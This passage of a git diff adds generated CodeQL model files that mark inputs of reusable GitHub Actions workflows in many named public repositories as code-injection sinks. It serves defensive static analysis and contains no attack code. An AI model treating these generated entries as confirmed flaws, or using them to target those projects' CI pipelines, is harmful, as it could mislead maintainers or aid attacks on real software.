["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.target_version", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.configuration", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml new file mode 100644 index 000000000000..2d35b933923f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"] + - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml new file mode 100644 index 000000000000..7ca34fc3e44d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.stage", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_optional", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_pre", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "inputs.dockerhub_repository", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.timeout", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.docker_push_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml new file mode 100644 index 000000000000..d3cc8e73b708 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "inputs.constraints", "code-injection", "generated"] + - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "inputs.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml new file mode 100644 index 000000000000..a9f8401aab2d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "inputs.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml new file mode 100644 index 000000000000..acf43426e564 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.run", "code-injection", "generated"] + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml new file mode 100644 index 000000000000..3c9178a91258 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.latest", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "inputs.self_hosted", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml new file mode 100644 index 000000000000..24603c25a777 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.ignore_test_status", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.test_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.browser_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.pr", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml new file mode 100644 index 000000000000..29f01c24bedd --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "inputs.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml new file mode 100644 index 000000000000..acad489dbe51 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml new file mode 100644 index 000000000000..e15b6d33042f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "inputs.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml new file mode 100644 index 000000000000..12c9f97b7a40 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "inputs.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml new file mode 100644 index 000000000000..685944420aaa --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.version", "code-injection", "generated"] + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml new file mode 100644 index 000000000000..884c3d154ad7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "inputs.verSion", "code-injection", "generated"] + - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "inputs.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml new file mode 100644 index 000000000000..799958a7feef --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml new file mode 100644 index 000000000000..32d3e59e1f8c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.marks", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.python-version", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "inputs.dbt-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml new file mode 100644 index 000000000000..f2893eb24070 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.user", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml new file mode 100644 index 000000000000..ea3b2029f822 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.patch", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.minor", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.major", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.preName", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.pre", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml new file mode 100644 index 000000000000..74bdcb807c88 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml new file mode 100644 index 000000000000..4c0442abd2b5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["supabase/auth/.github/workflows/publish.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml new file mode 100644 index 000000000000..39c81d39066c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "inputs.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml new file mode 100644 index 000000000000..82f5ba4be74d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "inputs.workflow_run", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_head_sha", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml new file mode 100644 index 000000000000..ffb08a8fa2e9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.map", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.minor", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.major", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml new file mode 100644 index 000000000000..4012908e7e9a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "inputs.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml new file mode 100644 index 000000000000..a1af8280ebc7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "inputs.target", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "inputs.manifest_name", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml new file mode 100644 index 000000000000..84de5681fea5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "inputs.asan", "code-injection", "generated"] + - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml new file mode 100644 index 000000000000..c9e8b5c23c0f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml new file mode 100644 index 000000000000..80dde7f2fc0e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "inputs.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml new file mode 100644 index 000000000000..1ffaa4e1cd0f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "inputs.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml new file mode 100644 index 000000000000..48b35d83c702 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.framework", "code-injection", "generated"] + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml new file mode 100644 index 000000000000..e1a0c8a9fcf3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "inputs.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml new file mode 100644 index 000000000000..71cd3fed3ed4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.pace", "code-injection", "generated"] + - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml new file mode 100644 index 000000000000..47f53f495f83 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.server_id", "code-injection", "generated"] + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml new file mode 100644 index 000000000000..1b592aa91cc4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "inputs.hz", "code-injection", "generated"] + - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "inputs.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml new file mode 100644 index 000000000000..db4e957a87a3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "inputs.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml new file mode 100644 index 000000000000..c3642c84f631 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml new file mode 100644 index 000000000000..3e6691f0e8f7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml new file mode 100644 index 000000000000..733c2e20a719 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml new file mode 100644 index 000000000000..cb80f74e4e89 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml new file mode 100644 index 000000000000..0f78ea086a6c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -0,0 +1,21 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml new file mode 100644 index 000000000000..e2bf8f96fa95 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "inputs.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml new file mode 100644 index 000000000000..4a8500a147eb --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.build-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.test-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.maven-repo-path", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "inputs.git-log-number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml new file mode 100644 index 000000000000..3e362cebc584 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.target", "code-injection", "generated"] + - 